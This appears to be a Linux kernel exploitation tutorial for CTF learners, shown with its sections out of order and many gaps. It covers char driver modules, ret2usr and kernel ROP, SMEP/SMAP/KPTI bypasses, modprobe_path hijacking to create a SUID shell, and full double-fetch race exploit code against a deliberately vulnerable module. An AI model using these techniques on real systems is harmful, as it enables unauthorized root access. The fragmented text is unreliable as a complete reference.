Writing a Char Module is suprisingly simple. First, we specify what happens on init (loading of the module) and exit (unloading of the module). We need some special headers for this.
It looks simple, because it is simple. For now, anyway.
First we set the license, because otherwise we get a warning, and I hate warnings. Next we tell the module what to do on load (intro_init()) and unload (intro_exit()). Note we put parameters as void, this is because kernel modules are very picky about (even if just void).
We then register the purposes of the functions using module_init() and module_exit().
Note that we use printk rather than printf. GLIBC doesn't exist in kernel mode, and instead we use C's in-built kernel functionality. KERN_ALERT is specifies the type of message sent, and .
Compiling
Compiling a Kernel Object can seem a little more complex as we use a , but it's surprisingly simple:
$(MAKE) is a special flag that effectively calls make, but it propagate all same flags that ourMakefile was called with. So, for example, if we call
Then $(MAKE) will become make -j 8. Essentially, $(MAKE) is make, which compiles the module. The files produced are defined at the top as obj-m. Note that compilation is unique per kernel, which is why the compiling process uses your unique kernel build section.
Using the Kernel Module
Now we've got a ko file compiled, we can add it to the list of active modules:
If it's successful, there will be no response. But where did it print to?
Remember, the kernel program has no concept of userspace; it does not know you ran it, nor does it bother communicating with userspace. Instead, this code runs in the kernel, and we can check the output using sudo dmesg.
Here we grab the last line using tail - as you can see, our printk is called!
Now let's unload the module:
And there our intro_exit is called.
You can view currently loaded modules using the lsmod command
Creating an interactive char driver is surprisingly simple, but there are a few traps along the way.
Exposing it to the File System
This is by far the hardest part to understand, but honestly a full understanding isn't really necessary. The new intro_init function looks like this:
A major number is essentially the unique identifier to the kernel module. You can specify it using the first parameter of register_chrdev, but if you pass 0 it is automatically assigned an unused major number.
We then have to register the class and the device. In complete honesty, I don't quite understand what they do, but this code exposes the module to /dev/intro.
Note that on an error it calls class_destroy and unregister_chrdev:
Cleaning it Up
These additional classes and devices have to be cleaned up in the intro_exit function, and we mark the major number as available:
Controlling I/O
In intro_init, the first line may have been confusing:
The third parameter fops is where all the magic happens, allowing us to create handlers for operations such as read and write. A really simple one would look something like:
The parameters to intro_read may be a bit confusing, but the 2nd and 3rd ones line up to the 2nd and 3rd parameters for the read() function itself:
We then use the function copy_to_user to write QWERTY to the buffer passed in as a parameter!
Full Code
Simply use sudo insmod to load it, .
Testing The Module
Create a really basic exploit.c:
If the module is successfully loaded, the read() call should read QWERTY into buffer:
Success!
Interactivity with IOCTL
A more useful way to interact with the driver
Linux contains a syscall called ioctl, which is often used to communicate with a driver. ioctl() takes three parameters:
File Descriptor fd
an unsigned int
an unsigned long
The driver can be adapted to make the latter two virtually anything - perhaps a pointer to a struct or a string. In the driver source, the code looks along the lines of:
But if you want, you can interpret cmd and arg as pointers if that is how you wish your driver to work.
To communicate with the driver in this case, you would use the ioctl() function, which you can import in C:
And you would have to update the file_operations struct:
On modern Linux kernel versions, . The former is the replacement for .ioctl, with the latter allowing 32-bit processes to perform ioctl calls on 64-bit systems. As a result, the new file_operations is likely to look more like this:
#define DEVICE_NAME "intro"
#define CLASS_NAME "intro"
// setting up the device
int major;
static struct class* my_class = NULL;
static struct device* my_device = NULL;
static int __init intro_init(void) {
major = register_chrdev(0, DEVICE_NAME, &fops); // explained later
if ( major < 0 )
printk(KERN_ALERT "[Intro] Error assigning Major Number!");
// Register device class
my_class = class_create(THIS_MODULE, CLASS_NAME);
if (IS_ERR(my_class)) {
unregister_chrdev(major, DEVICE_NAME);
printk(KERN_ALERT "[Intro] Failed to register device class\n");
}
// Register the device driver
my_device = device_create(my_class, NULL, MKDEV(major, 0), NULL, DEVICE_NAME);
if (IS_ERR(my_device)) {
class_destroy(my_class);
unregister_chrdev(major, DEVICE_NAME);
printk(KERN_ALERT "[Intro] Failed to create the device\n");
}
return 0;
}
static void __exit intro_exit(void) {
device_destroy(my_class, MKDEV(major, 0)); // remove the device
class_unregister(my_class); // unregister the device class
class_destroy(my_class); // remove the device class
unregister_chrdev(major, DEVICE_NAME); // unregister the major number
printk(KERN_INFO "[Intro] Closing!\n");
}
While the kernel cannot execute code in userland, it can set its RSP to a userland location, so it is possible to stack pivot to userland as long as all of the gadgets used are in kernel space.
I don't think an example is necessary for this.
SMEP
Supervisor Memory Execute Protection
If ret2usr is analogous to ret2shellcode, then SMEP is the new NX. SMEP is a primitive protection that ensures any code executed in kernel mode is located in kernel space, and it does this based on the User/Supervisor bit in page tables. This means a simple ROP back to our own shellcode no longer works. To bypass SMEP, we have to use gadgets located in the kernel to achieve what we want to (without switching to userland code).
In older kernel versions we could use ROP to disable SMEP entirely, but this has been patched out. This was possible because SMEP is determined by the 20th bit of the CR4 register, meaning that if we can control CR4 we can disable SMEP from messing with our exploit.
We can enable SMEP in the kernel by controlling the respective QEMU flag (qemu64 is not notable):
-cpu qemu64,+smep
Sometimes it will be enabled by default, in which case you need to us nosmep.
Kernel ROP - Privilege Escalation in Kernel Space
Bypassing SMEP by ropping through the kernel
The previous approach failed, so let's try and escalate privileges using purely ROP.
Modifying the Payload
Calling prepare_kernel_cred()
First, we have to change the ropchain. Start off with finding some useful gadgets and calling prepare_kernel_cred(0):
Now comes the trickiest part, which involves moving the result of RAX to RSI before calling commit_creds().
Moving RAX to RDI for commit_creds()
This requires stringing together a collection of gadgets (which took me an age to find). See if you can find them!
I ended up combining these four gadgets:
Gadget 1 is used to set RDX to 0, so we bypass the jne in Gadget 2 and hit ret
Gadget 2 and Gadget 3 move the returned cred struct from RAX to RDX
Returning to userland
Recall that we need swapgs and then iretq. Both can be found easily.
The pop rbp; ret is not important as iretq jumps away anyway.
To simulate the pushing of RIP, CS, SS, etc we just create the stack layout as it would expect - RIP|CS|RFLAGS|SP|SS, the reverse of the order they are pushed in.
If we try this now, we successfully escalate privileges!
Final Exploit
Kernel ROP - Disabling SMEP
An old technique
Setup
Using the same setuo as ret2usr, we make one single modification in run.sh:
Now if we load the VM and run our exploit from last time, we get a kernel panic.
Kernel Panic
It's worth noting what it looks like for the future - especially these 3 lines:
Overwriting CR4
So, instead of just returning back to userspace, we will try to overwrite CR4. Luckily, the kernel contains a very useful function for this: . This function quite literally overwrites CR4.
Assuming KASLR is still off, we can get the address of this function via /proc/kallsyms (if we update init to log us in as root):
Ok, it's located at 0xffffffff8102b6d0. What do we want to change CR4 to? If we look at the kernel panic above, we see this line:
CR4 is currently 0x00000000001006b0. If we remove the 20th bit (from the smallest, zero-indexed) we get 0x6b0.
The last thing we need to do is find some gadgets. To do this, we have to convert the bzImage file into a vmlinux ELF file so that we can run ropper or ROPgadget on it. To do this, we can run , from the official Linux git repository.
Putting it all together
All that changes in the exploit is the overflow:
We can then compile it and run.
Failure
This fails. Why?
If we look at the resulting kernel panic, we meet an old friend:
SMEP is enabled again. How? If we , we definitely hit both the gadget and the call to native_write_cr4(). What gives?
Well, if we look at , there's another feature:
Essentially, it will check if the val that we input disables any of the bits defined in cr4_pinned_bits. This value is , and stops "sensitive CR bits" from being modified. If they are, they are unset. Effectively, modifying CR4 doesn't work any longer - and hasn't since .
Overwriting modprobe_path
A simple way to pop a shell
The kernel can request that a kernel module is loaded at runtime. If it does so, it will try to call request_module, which will spawn the modprobe tool using call_modprobe. modprobe is a userspace program that runs with root privileges, finds the required kernel module binary on filesystem and loads it.
The path to modprobe is in modprobe_path, a global variable in the kernel. We can read the value as a non-root user through /proc/sys/kernel/modprobe, with the default value being /sbin/modprobe.
If we can overwrite modprobe_path with another binary, e.g. /tmp/exec, this will be run with root privileges! That makes it very easy. To trigger modprobe, the easiest way is to execute a binary with an unknown signature:
To identify what program should be run to handle the signature, the kernel uses (code is slightly different in newer versions). This is run by request_module, but the signature .
The approach, therefore is simple. First compile a /tmp/hijack with source:
There are lots of possible payloads, but the end result is the same. This will copy /bin/sh to /tmp/sh and make it SUID. Now we create a file with an unknown signature:
Finally, overwrite modprobe_path to /tmp/hijack. When we execute /tmp/fake as a regular user, the kernel will spawn /tmp/hijack with root privileges and execute it!
The kernel is the program at the heart of the Operating System. It is responsible for controlling every aspect of the computer, from the nature of syscalls to the integration between software and hardware. As such, exploiting the kernel can lead to some incredibly dangerous bugs.
In the context of CTFs, Linux kernel exploitation often involves the exploitation of kernel modules. This is an integral feature of Linux that allows users to extend the kernel with their own code, adding additional features.
You can find an excellent introduction to Kernel Drivers and Modules by LiveOverflow here, and I recommend it highly.
Kernel Modules
Kernel Modules are written in C and compiled to a .ko (Kernel Object) format. Most kernel modules are compiled for a specific version kernel version (which can be checked with uname -r, my Xenial Xerus is 4.15.0-128-generic). We can load and unload these modules using the insmod and rmmod commands respectively. Kernel modules are often loaded into /dev/* or /proc/. There are 3 main module types: Char, Block and Network.
Char Modules
Char Modules are deceptively simple. Essentially, you can access them as a stream of bytes - just like a file - using syscalls such as open. In this way, they're virtually almost dynamic files (at a super basic level), as the values read and written can be changed.
Examples of Char modules include /dev/random.
I'll be using the term module and device interchangeably. As far as I can tell, they are the same, but please let me know if I'm wrong!
A Basic Kernel Interaction Challenge
The Module
We're going to create a really basic authentication module that allows you to read the flag if you input the correct password. Here is the relevant code:
If we attempt to read() from the device, it checks the authenticated flag to see if it can return us the flag. If not, it sends back FAIL: Not Authenticated!.
In order to update authenticated, we have to write() to the kernel module. What we attempt to write it compared to p4ssw0rd. If it's not equal, nothing happens. If it is, authenticated is updated and the next time we read() it'll return the flag!
Interacting
Let's first try and interact with the kernel by reading from it.
Make sure you sudo chmod 666 /dev/authentication!
We'll start by opening the device and reading from it.
Note that in the module source code, the length of read() is completely disregarded, so we could make it any number at all! Try switching it to 1 and you'll see.
After compiling, we get that we are not authenticated:
Epic! Let's write the correct password to the device then try again. It's really important to send the null byte here! That's because copy_from_user() does not automatically add it, so the strcmp will fail otherwise!
It works!
Amazing! Now for something really important:
The state is preserved between connections! Because the kernel module remains on, you will be authenticated until the module is reloaded (either via rmmod then insmod, or a system restart).
Final Code
Challenge - IOCTL
So, here's your challenge! Write the same kernel module, but using ioctl instead. Then write a program to interact with it and perform the same operations. ZIP file including both below, but no cheating! This is really good practise.
Let's try and run our previous code, but with the latest kernel version (as of writing, 6.10-rc5). The offsets of commit_creds and prepare_kernel_cred() are as follows, and we'll update exploit.c with the new values:
The major number needs to be updated to 253 in init for this version! I've done it automatically, but it bears remembering if you ever try to create your own module.
Instead of an elevated shell, we get a kernel panic, with the following data dump:
I could have left this part out of my blog, but it's valuable to know a bit more about debugging the kernel and reading error messages. I actually came across this issue while , so it happens to all of us!
One thing that we can notice is that, the error here is listed as a NULL pointer dereference error. We can see that the error is thrown in commit_creds():
We can , but chances are that the parameter passed to commit_creds() is NULL - this appears to be the case, since RDI is shown to be 0 above!
Opening a GDBserver
In our run.sh script, we now include the -s flag. This flag opens up a GDB server on port 1234, so we can connect to it and debug the kernel. Another useful flag is -S, which will automatically pause the kernel on load to allow us to debug, but that's not necessary here.
What we'll do is pause our exploit binary just before the write() call by using getchar(), which will hang until we hit Enter or something similar. Once it pauses, we'll hook on with GDB. Knowing the address of commit_creds() is 0xffffffff81077390, we can set a breakpoint there.
We then continue with c and go back to the VM terminal, where we hit Enter to continue the exploit. Coming back to GDB, it has hit the breakpoint, and we can see that RDI is indeed 0:
This explains the NULL dereference. RAX is also 0, in fact, so it's not a problem with the mov:
This means that prepare_kernel_cred() is returning NULL. Why is that? It didn't do that before!
Finding the Issue
Let's compare the differences in prepare_kernel_cred() code between kernel and :
The last and first parts are effectively identical, so there's no issue there. The issue arises in the way it handles a NULL argument. On 5.10, it treats it as using init_task:
i.e. if daemon is NULL, use init_task. On 6.10, the behaviour is altogether different:
If daemon is NULL, return NULL - hence our issue! Instead, we have to pass a valid cred struct into RDI. The simplest way is to just pass init_cred, which is actually a static offset from the kernel base! This means that if we're in a position to get commit_creds and prepare_kernel_cred, we can also get init_cred without major issues.
Passing in init_cred
init_cred is defined . There is no symbol associated with it (unless the kernel was compiled with debugging symbols), so we can't read /proc/kallsyms and get the address like that.
Kernel ROP - ret2usr
ROPpety boppety, but now in the kernel
Introduction
By and large, the principle of userland ROP holds strong in the kernel. We still want to overwrite the return pointer, the only question is where.
The most basic of examples is the ret2usr technique, which is analogous to ret2shellcode - we write our own assembly that calls commit_creds(prepare_kernel_cred(0)), and overwrite the return pointer to point there.
Vulnerable Module
Note that the kernel version here is 6.1, due to some modifications we will discuss later.
The relevant code is here:
As we can see, it's a size 0x100memcpy into an 0x20 buffer. Not the hardest thing in the world to spot. The second printk call here is so that buffer is used somewhere, otherwise it's just optimised out by make and the entire function just becomes xor eax, eax; ret!
Exploitation
Assembly to escalate privileges
Firstly, we want to find the location of prepare_kernel_cred() and commit_creds(). We can do this by reading /proc/kallsyms, a file that contains all of the kernel symbols and their locations (including those of our kernel modules!). This will remain constant, as we have disabled .
For obvious reasons, you require root permissions to read this file!
Now we know the locations of the two important functions: After that, the assembly is pretty simple. First we call prepare_kernel_cred(0):
Then we call commit_creds() on the result (which is stored in RAX):
We can throw this directly into the C code using inline assembly:
Overflow
The next step is overflowing. The 7th qword overwrites RIP:
Finally, we create a get_shell() function we call at the end, once we've escalated privileges:
Returning to userland
If we run what we have so far, we fail and the kernel panics. Why is this?
The reason is that once the kernel executes commit_creds(), it doesn't return back to user space - instead it'll pop the next junk off the stack, which causes the kernel to crash and panic! You can see this happening while you debug (which ).
What we have to do is force the kernel to swap back to user mode. The way we do this is by saving the initial userland register state from the start of the program execution, then once we have escalate privileges in kernel mode, we restore the registers to swap to user mode. This reverts execution to the exact state it was before we ever entered kernel mode!
We can store them as follows:
The CS, SS, RSP and RFLAGS registers are stored in 64-bit values within the program. To restore them, we append extra assembly instructions in escalate() for after the privileges are acquired:
Here the GS, CS, SS, RSP and RFLAGS registers are restored to bring us back to user mode (GS via the swapgs instruction). The RIP register is updated to point to get_shell and pop a shell.
If we compile it statically and load it into the initramfs.cpio, notice that our privileges are elevated!
We have successfully exploited a ret2usr!
Understanding the restoration
How exactly does the above assembly code restore registers, and why does it return us to user space? To understand this, we have to know what do. The switch to kernel mode is best explained by , or .
. The (model-specific registers); at the entry to a kernel-space routine, swapgs enables the process to obtain a pointer to kernel data structures.
Has to swap back to user space
SS - Stack Segment
GS is changed back via the swapgs instruction. All others are changed back via , the QWORD variant of the iret family of intel instructions. The intent behind iretq is to be the way to return from exceptions, and it is specifically designed for this purpose, as seen in Vol. 2A 3-541 of the :
Returns program control from an exception or interrupt handler to a program or procedure that was interrupted by an exception, an external interrupt, or a software-generated interrupt. These instructions are also used to perform a return from a nested task. (A nested task is created when a CALL instruction is used to initiate a task switch or when an interrupt or exception causes a task switch to an interrupt or exception handler.)
[...]
During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure.
As we can see, it pops all the registers off the stack, which is why we push the saved values in that specific order. It may be possible to restore them sequentially without this instruction, but that increases the likelihood of things going wrong as one restoration may have an adverse effect on the following - much better to just use iretq.
A double-fetch vulnerability is when data is accessed from userspace multiple times. Because userspace programs will commonly pass parameters in to the kernel as pointers, the data can be modified at any time. If it is modified at the exact right time, an attacker could compromise the execution of the kernel.
A Vulnerable Kernel Module
Let's start with a convoluted example, where all we want to do is change the id that the module stores. We are not allowed to set it to 0, as that is the ID of root, but all other values are allowed.
The code below will be the contents of the read() function of a kernel. I've removed , but here are the relevant parts:
The program will:
Check if the ID we are attempting to switch to is 0
If it is, it doesn't allow us, as we attempted to log in as root
Sleep for 1 second (this is just to illustrate the example better, we will remove it later)
Simple Communication
Let's say we want to communicate with the module, and we set up a simple C program to do so:
We compile this statically (as there are no shared libraries on our VM):
As expected, the id variable gets set to 900 - we can check this in dmesg:
That all works fine.
Exploiting a Double-Fetch and Switching to ID 0
The flaw here is that creds->id is dereferenced twice. What does this mean? The kernel module is passed a reference to a Credentials struct:
This is a pointer, and that is perhaps the most important thing to remember. When we interact with the module, we give it a specific memory address. This memory address holds the Credentials struct that we define and pass to the module. The kernel does not have a copy - it relies on the user's copy, and goes to userspace memory to use it.
Because this struct is controlled by the user, they have the power to change it whenever they like.
The kernel module uses the id field of the struct on two separate occasions. Firstly, to check that the ID we wish to swap to is valid (not 0):
And once more, to set the id variable:
Again, this might seem fine - but it's not. What is stopping it from changing inbetween these two uses? The answer is simple: nothing. That is what differentiates userspace exploitation from kernel space.
A Proof-of-Concept: Switching to ID 0
Inbetween the two dereferences creds->id, there is a timeframe. Here, we have artificially extended it (by sleeping for one second). We have a race codition - the aim is to switch id in that timeframe. If we do this successfully, we will pass the initial check (as the ID will start off as 900), but by the time it is copied to id, it will have become 0 and we have bypassed the security check.
Here's the plan, visually, if it helps:
In the waiting period, we swap out the id.
If you are trying to compile your own kernel, you need CONFIG_SMP enabled, because we need to modify it in a different thread! Additionally, you need QEMU to have the flag -smp 2 (or more) to enable 2 cores, though it may default to having multiple even without the flag. This example may work without SMP, but that's because of the sleep - when we most onto part 2, with no sleep, we require multiple cores.
The C program will hang on write until the kernel module returns, so we can't use the main thread.
With that in mind, the "exploit" is fairly self-explanatory - we start another thread, wait 0.3 seconds, and change id!
We have to compile it statically, as the VM has no shared libraries.
Now we have to somehow get it into the file system. In order to do that, we need to first extract the .cpio archive (you may want to do this in another folder):
Now copy exploit there and make sure it's marked executable. You can then compress the filesystem again:
Use the newly-created initramfs.cpio to lauch the VM with run.sh. Executing exploit, it is successful!
Note that the VM loaded you in as root by default. This is for debugging purposes, as it allows you to use utilities such as dmesg to read the kernel module output and check for errors, as well as a host of other things we will talk about. When testing exploits, it's always helpful to fix the init script to load you in as root! Just don't forget to test it as another user in the end.
The Ultimate Aim of Kernel Exploitation - Process Credentials
Overview
Userspace exploitation often has the end goal of code execution. In the case of kernel exploitation, we already have code execution; our aim is to escalate privileges, so that when we spawn a shell (or do anything else) using execve("/bin/sh", NULL, NULL) we are dropped as root.
To understand this, we have a talk a little about how privileges and credentials work in Linux.
KASLR
KASLR is the kernel version of ASLR, randomizing various parts of kernel space to make expoitation more complicated (in the exact same way regular ASLR does so for userspace exploitation).
TODO
Random stuff I want to mention somewhere, but too small for its own page
Discuss sched_yield and CPU affinity.
Kernel code gets patched at runtime (ch4)
Heap Structures
Compare the password to p4ssw0rd
If it is, it will set the id variable to the id in the creds structure
The cred struct contains all the permissions a task holds. The ones that we care about are typically these:
These fields are all unsigned int fields, and they represent what you would expect - the UID, GID, and a few other less common IDs for other operations (such as the FSUID, which is checked when accessing a file on the file system). As you can expect, overwriting one or more of these fields is likely a pretty desirable goal.
Note the __randomize_layout here at the end! This is a compiler flag that tells it to mix the layout up on each load, making it harder to target the structure!
task_struct
The kernel needs to store information about each running task, and to do this it uses the task_structstructure. Each kernel task has its own instance.
The task_struct instances are stored in a linked list, with a global kernel variable init_task pointing to the first one. Each task_struct then points to the next.
Along with linking data, the task_struct also (more importantly) stores real_cred and cred, which are both pointers to a cred struct. The difference between the two is explained here:
In effect, real_cred is the initial credential of the process, and is used by processes acting on the process. cred is the current credential, used to define what the process is allowed to do. We have to keep track of both as some processes care about the initial cred and some about the updated.
An example of caring about the real_cred instead of cred is in the implementation of /proc/$PID/status, which displays the real_cred as the owner of a process, even if privileges are elevated (note that __task_struct is a macro to grab real_cred, confusingly). Conversely, setuid executables will modify cred and not real_cred.
So, which set of credentials do we want to target with an arbitrary write? It will depend on what set is relevant for the purpose, but since you usually want to do be creating new processes (through system or execve), the cred is used. In some cases, real_cred will work too, because it seems as if the pointers initially point to the same struct (though note that this excerpt is not from process creation but copy_process, which is called by the fork syscall, so it could differ for new process creation).
prepare_kernel_cred() and commit_creds()
As an alternative to overwriting cred structs in the unpredictable kernel heap, we can call prepare_kernel_cred() to generate a new valid cred struct and commit_creds() to overwrite the real_cred and cred of the current task_struct.
prepare_kernel_cred()
The function can be found here, but there's not much to say - it creates a new cred struct called new then destroys the old. It returns new.
#define PASSWORD "p4ssw0rd"
typedef struct {
int id;
char password[10];
} Credentials;
static int id = 1001;
static ssize_t df_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
Credentials *creds = (Credentials *)buf;
printk(KERN_INFO "[Double-Fetch] Reading password from user...");
if (creds->id == 0) {
printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
return -1;
}
// to increase reliability
msleep(1000);
if (!strcmp(creds->password, PASSWORD)) {
id = creds->id;
printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
return id;
}
printk(KERN_ALERT "[Double-Fetch] Password incorrect!");
return -1;
}
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
typedef struct {
int id;
char password[10];
} Credentials;
int main() {
int fd = open("/dev/double_fetch", O_RDWR);
printf("FD: %d\n", fd);
Credentials creds;
creds.id = 900;
strcpy(creds.password, "p4ssw0rd");
int res_id = write(fd, &creds, 0); // last parameter here makes no difference
printf("New ID: %d\n", res_id);
return 0;
}
gcc -static -o exploit exploit.c
$ dmesg
[...]
[ 3.104165] [Double-Fetch] Password correct! ID set to 900
Credentials *creds = (Credentials *)buf;
if (creds->id == 0) {
printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
return -1;
}
if (!strcmp(creds->password, PASSWORD)) {
id = creds->id;
printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
return id;
}
// gcc -static -o exploit -pthread exploit.c
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
void *switcher(void *arg);
typedef struct {
int id;
char password[10];
} Credentials;
int main() {
// communicate with the module
int fd = open("/dev/double_fetch", O_RDWR);
printf("FD: %d\n", fd);
// use a random ID and set the password correctly
Credentials creds;
creds.id = 900;
strcpy(creds.password, "p4ssw0rd");
// set up the switcher thread
// pass it a pointer to `creds`, so it can modify it
pthread_t thread;
if (pthread_create(&thread, NULL, switcher, &creds)) {
fprintf(stderr, "Error creating thread\n");
return -1;
}
// now we write the cred struct to the module
// it should be swapped after about .3 seconds by switcher
int res_id = write(fd, &creds, 0);
// write returns the id we switched to
// if all goes well, that is 0
printf("New ID: %d\n", res_id);
// finish thread cleanly
if (pthread_join(thread, NULL)) {
fprintf(stderr, "Error joining thread\n");
return -1;
}
return 0;
}
void *switcher(void *arg) {
Credentials *creds = (Credentials *)arg;
// wait until the module is sleeping - don't want to change it BEFORE the initial ID check!
sleep(0.3);
creds->id = 0;
}
struct cred {
/* ... */
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
/* ... */
} __randomize_layout;
struct task_struct {
/* ... */
/*
* Pointers to the (original) parent process, youngest child, younger sibling,
* older sibling, respectively. (p->father can be replaced with
* p->real_parent->pid)
*/
/* Real parent process: */
struct task_struct __rcu *real_parent;
/* Recipient of SIGCHLD, wait4() reports: */
struct task_struct __rcu *parent;
/*
* Children/sibling form the list of natural children:
*/
struct list_head children;
struct list_head sibling;
struct task_struct *group_leader;
/* ... */
/* Objective and real subjective task credentials (COW): */
const struct cred __rcu *real_cred;
/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu *cred;
/* ... */
};
/*
* The security context of a task
*
* The parts of the context break down into two categories:
*
* (1) The objective context of a task. These parts are used when some other
* task is attempting to affect this one.
*
* (2) The subjective context. These details are used when the task is acting
* upon another object, be that a file, a task, a key or whatever.
*
* Note that some members of this structure belong to both categories - the
* LSM security pointer for instance.
*
* A task has two security pointers. task->real_cred points to the objective
* context that defines that task's actual details. The objective part of this
* context is used whenever that task is acted upon.
*
* task->cred points to the subjective context that defines the details of how
* that task is going to act upon another object. This may be overridden
* temporarily to point to another security context, but normally points to the
* same context as task->real_cred.
*/
In reality, there won't be a 1-second sleep for your race condition to occur. This means we instead have to hope that it occurs in the assembly instructions between the two dereferences!
This will not work every time - in fact, it's quite likely to not work! - so we will instead have two loops; one that keeps writing 0 to the ID, and another that writes another value - e.g. 900 - and then calling write. The aim is for the thread that switches to 0 to sync up so perfectly that the switch occurs inbetween the ID check and the ID "assignment".
Analysis
If we check the source, we can see that there is no msleep any longer:
Exploitation
Our exploit is going to look slightly different! We'll create the Credentials struct again and set the ID to 900:
Then we are going to write this struct to the module repeatedly. We will loop it 1,000,000 times (effectively infinite) to make sure it terminates:
If the ID returned is 0, we won the race! It is really important to keep in mind exactly what the "success" condition is, and how you can check for it.
Now, in the second thread, we will constantly cycle between ID 900 and 0. We do this in the hope that it will be 900 on the first dereference, and 0 on the second! I make this loop infinite because it is a thread, and the thread will be killed when the program is (provided you remove pthread_join()! Otherwise your main thread will wait forever for the second to stop!).
Compile the exploit and run it, we get the desired result:
Look how quick that was! Insane - two fails, then a success!
Race Analysis
You might be wondering how tight the race window can be for exploitation - well, had a race of two assembly instructions:
The dereferences [rbx] have just one assembly instruction between, yet we are capable of racing. THAT is just how tight!
SMAP
Supervisor Memory Access Protection
SMAP is a more powerful version of SMEP. Instead of preventing code in user space from being accessed, SMAP places heavy restrictions on accessing user space at all, even for accessing data. SMAP blocks the kernel from even dereferencing (i.e. accessing) data that isn't in kernel space unless it is a set of very specific functions.
For example, functions such as strcpy or memcpy do not work for copying data to and from user space when SMAP is enabled. Instead, we are provided the functions copy_from_user and copy_to_user, which are allowed to briefly bypass SMAP for the duration of their operation. These functions also have additional hardening against attacks such as buffer overflows, with the function __copy_overflow acting as a guard against them.
This means that whether you interact using write/read or ioctl, the structs that you pass via pointers all get copied to kernel space using these functions before they are messed around with. This also means that double-fetches are even more unlikely to occur as all operations are based on the snapshot of the data that the module took when copy_from_user was called (unless copy_from_user is called on the same struct multiple times).
Like SMEP, SMAP is controlled by the CR4 register, in this case the 21st bit. It is also , so overwriting CR4 does nothing, and instead we have to work around it. There is no specific "bypass", it will depend on the challenge and will simply have to be accounted for.
Enabling SMAP is just as easy as SMEP:
Sometimes it needs to be disabled instead, in which case the option is nosmap.
Stac and Clac Instructions
TODO
Putting Exploit Data Into Kernel Memory instead of Userspace
TODO
KPTI
Kernel Page Table Isolation
is designed to protect against attacks that abuse the shared user/kernel address space. Originally called KAISER, it is a mitigation originally created to prevent -style microarchitectural vulnerabilities.
KPTI separates the page tables for user space and kernel space, creating two sets.
The first set, used by the kernel, includes a complete mapping of user space that the kernel can use for things like copy_to_user(). This page table has the NX bit set for userspace memory.
Compiling, Customising and booting the Kernel
Instructions for compiling the kernel with your own settings, as well as compiling kernel modules for a specific kernel version.
This isn't necessary for learning how to write kernel exploits - all the important parts will be provided! This is just to help those hoping to write challenges of their own, or perhaps set up their own VMs for learning purposes.
Prerequisites
The user set maps the minimum amount of kernel virtual memory possible (e.g. exception handlers and code required for the user to transition to the kernel).
You can disable KPTI from the command line via the nopti argument. It is also automatically disabled if the CPU is not affected by meltdown.
Consequences and Bypasses
When in the user context, the kernel is not fully mapped. This doesn't affect most of our exploits, since they are executed in kernel mode.
However, when in kernel mode, userspace is mapped as non-executable. This means that we can't return to an escalate() function we defined via iretq. The solution to this is to swap page tables back to user ones.
To achieve this, we can abuse a function of use that is descriptively called swapgs_restore_regs_and_return_to_usermode. Disassembling it (TODO!), we see that is starts with a load of pop instructions before a few mov and push and then a page table switch and a swapgs and iretq. We can jump to after the pop instructions to avoid having to fill those in. This is commonly called a KPTI Trampoline.
TODO example
Bypassing KPTI via a SIGSEGV Handler
Trying to return to user mode via iretq without switching page tables results in a SIGSEGV rather than a kernel crash, because we are in userspace.
An alternative method is therefore to use a SIGSEGV handler - the exploit gets root privileges, then tries to access userland and triggers a SIGSEGV. The kernel fault handler with switch the page tables for us when dispatching to the handler! A good example can be found here.
if (creds->id == 0) {
printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
return -1;
}
printk("[Double-Fetch] Attempting login...");
if (!strcmp(creds->password, PASSWORD)) {
id = creds->id;
printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
return id;
}
// don't want to make the loop infinite, just in case
for (int i = 0; i < 1000000; i++) {
// now we write the cred struct to the module
res_id = write(fd, &creds, 0);
// if res_id is 0, stop the race
if (!res_id) {
puts("[+] ID is 0!");
break;
}
}
~ $ ./exploit
FD: 3
[ 2.140099] [Double-Fetch] Attempted to log in as root!
[ 2.140099] [Double-Fetch] Attempted to log in as root!
[+] ID is 0!
[-] Finished race
; note that rbx is the buf argument, user-controlled
cmp dword ptr [rbx], 5
ja default_case
mov eax, [rbx]
mov rax, jump_table[rax*8]
jmp rax
There may be other requirements, I just already had them. Check here for the full list.
The Kernel
Cloning
Use --depth 1 to only get the last commit.
Customise
Remove the current compilation configurations, as they are quite complex for our needs
Now we can create a minimal configuration, with almost all options disabled. A .config file is generated with the least features and drivers possible.
We create a kconfig file with the options we want to enable. An example is the following:
Explanation of Options
CONFIG_64BIT - compiles the kernel for 64-bit
CONFIG_SMP - simultaneous multiprocessing; allows the kernel to run on multiple cores
CONFIG_PRINTK, CONFIG_PRINTK_TIME - enables log messages and timestamps
CONFIG_PCI - enables support for loading an initial RAM disk
CONFIG_RD_GZIP - enables support for gzip-compressed initrd images
CONFIG_BINFMT_ELF - enables support for executing ELF binaries
CONFIG_BINFMT_SCRIPT - enables executing scripts with a shebang (#!) line
CONFIG_DEVTMPFS - Enables automatic creation of device nodes in /dev at boot time using devtmpfs
CONFIG_INPUT - enables support for the generic input layer required for input device handling
CONFIG_INPUT_EVDEV - enables support for the event device interface, which provides a unified input event framework
CONFIG_INPUT_KEYBOARD - enables support for keyboards
CONFIG_MODULES - enables support for loading and unloading kernel modules
CONFIG_KPROBES - disables support for kprobes, a kernel-based debugging mechanism. We disable this because ... TODO
CONFIG_LTO_NONE - disables Link Time Optimization (LTO) for kernel compilation. This is to
CONFIG_SERIAL_8250, CONFIG_SERIAL_8250_CONSOLE - TODO
CONFIG_EMBEDDED - disables optimizations/features for embedded systems
